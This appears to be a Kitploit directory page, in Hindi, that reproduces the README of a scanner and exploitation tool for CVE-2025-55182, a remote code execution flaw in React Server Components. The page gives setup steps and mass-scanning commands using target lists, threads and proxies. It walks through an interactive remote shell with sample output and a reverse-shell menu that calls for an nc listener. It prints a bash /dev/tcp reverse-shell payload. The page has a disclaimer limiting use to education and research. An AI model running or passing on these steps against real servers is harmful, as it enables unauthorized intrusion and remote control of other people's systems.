Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — React सर्वर घटकों के लिए महत्वपूर्ण RCE भेद्यता स्कैनर (CVE-2025-55182)। मल्टी-पेलोड समर्थन, प्रॉक्सी क्षमताओं और इंटरैक्टिव कमांड निष्पादन के साथ स्वचालित शोषण ढांचा। | Kitploit
उपकरण/GitHubGitHub/alihzsec/cve-2025-55182
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

React सर्वर घटकों के लिए महत्वपूर्ण RCE भेद्यता स्कैनर (CVE-2025-55182)। मल्टी-पेलोड समर्थन, प्रॉक्सी क्षमताओं और इंटरैक्टिव कमांड निष्पादन के साथ स्वचालित शोषण ढांचा।

रिपॉजिटरी देखें
15139 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 स्कैनर और एक्सप्लॉइटर

[!Warning] यह रिपॉजिटरी केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है।

  • प्रदान किए गए PoCs का उपयोग केवल उन सिस्टमों पर करें जो आपके स्वामित्व में हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
  • अनधिकृत पहुंच, शोषण, या इस रिपॉजिटरी में किसी भी सामग्री का दुरुपयोग अवैध है।
  • लेखक किसी भी क्षति, दुरुपयोग, या अनुचित उपयोग से उत्पन्न कानूनी परिणामों की कोई जिम्मेदारी नहीं लेते।

🔍 अवलोकन

CVE-2025-55182 एक गंभीर दूरस्थ कोड निष्पादन भेद्यता है जो React Server Components के संस्करणों 19.0.0, 19.1.0, 19.1.1 और 19.2.0 को प्रभावित करती है। यह भेद्यता HTTP अनुरोध पेलोड को सर्वर फंक्शन एंडपॉइंट्स पर असुरक्षित डिसीरियलाइज़ेशन के कारण उत्पन्न होती है, जिससे अप्रमाणित हमलावर दूरस्थ रूप से मनमाना कोड निष्पादित कर सकते हैं।


🐛 भेद्यता विवरण

CVE आईडी: CVE-2025-55182
प्रभावित संस्करण:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 स्थापना

पूर्वापेक्षाएँ

  • Python 3.8 या उच्चतर
  • pip (Python पैकेज मैनेजर)

सेटअप

  1. रिपॉजिटरी क्लोन करें
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. वर्चुअल एनवायरनमेंट बनाएं (अनुशंसित)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. निर्भरताएँ स्थापित करें
root@kitploit:~
pip install -r requirements.txt

📖 उपयोग

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

तर्क

तर्क

तर्कविवरण
-d, --detectionडिटेक्शन मोड में चलाएं (भेद्यताओं के लिए स्कैन करें)
-e, --exploitएक्सप्लॉइटेशन मोड में चलाएं (एकल लक्ष्य का शोषण करें)
-u, --url URLस्कैन/एक्सप्लॉइट करने के लिए एकल लक्ष्य URL
-l, --list FILEलक्ष्य URL की सूची वाली फ़ाइल (केवल डिटेक्शन मोड)
-p, --proxy URLएकल प्रॉक्सी URL (जैसे, http://127.0.0.1:8080)
-pl, --proxy-list FILEप्रॉक्सी URL की सूची वाली फ़ाइल (प्रति पंक्ति एक)
-t, --threads Nसमवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 10, केवल डिटेक्शन मोड)
-s, --silentसाइलेंट मोड - केवल भेद्य लक्ष्य दिखाएं (केवल डिटेक्शन मोड)
-o, --output [FILE]भेद्य लक्ष्यों को फ़ाइल में सहेजें (केवल डिटेक्शन मोड). यदि कोई फ़ाइल नाम नहीं दिया गया है, तो डिफ़ॉल्ट: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugडीबग लॉगिंग सक्षम करें - प्रतिक्रिया विवरण और पुनर्प्रयास प्रयास दिखाता है (साइलेंट मोड में उपलब्ध नहीं)

🎯 डिटेक्शन मोड

एकल लक्ष्य स्कैन करें

root@kitploit:~
python3 main.py -d -u https://example.com

फ़ाइल से अनेक लक्ष्य स्कैन करें

root@kitploit:~
python3 main.py -d -l targets.txt

प्रॉक्सी के साथ स्कैन करें

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

साइलेंट मोड (केवल भेद्य लक्ष्य आउटपुट करें)

root@kitploit:~
python3 main.py -d -l targets.txt -s

मल्टी-थ्रेडेड स्कैनिंग

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 एक्सप्लॉइटेशन मोड

इंटरैक्टिव शेल

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Then select [i] for interactive shell:

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

रिवर्स शेल

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Then select [r] for reverse shell and choose payload type:

Option 1: Default Payloads (Recommended)

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

The tool will automatically try 17+ different reverse shell payloads until one succeeds.

Option 2: Custom Payload

root@kitploit:~
Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 संदर्भ

  • आधिकारिक React सुरक्षा सलाहकार
  • Meta सुरक्षा सलाहकार
  • Vercel सुरक्षा सलाहकार
  • Next.js सुरक्षा सलाहकार
  • CVE विवरण

यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे एक स्टार देने पर विचार करें! ⭐
सुरक्षा समुदाय के लिए ❤️ से बनाया गया
टूल डाउनलोड करें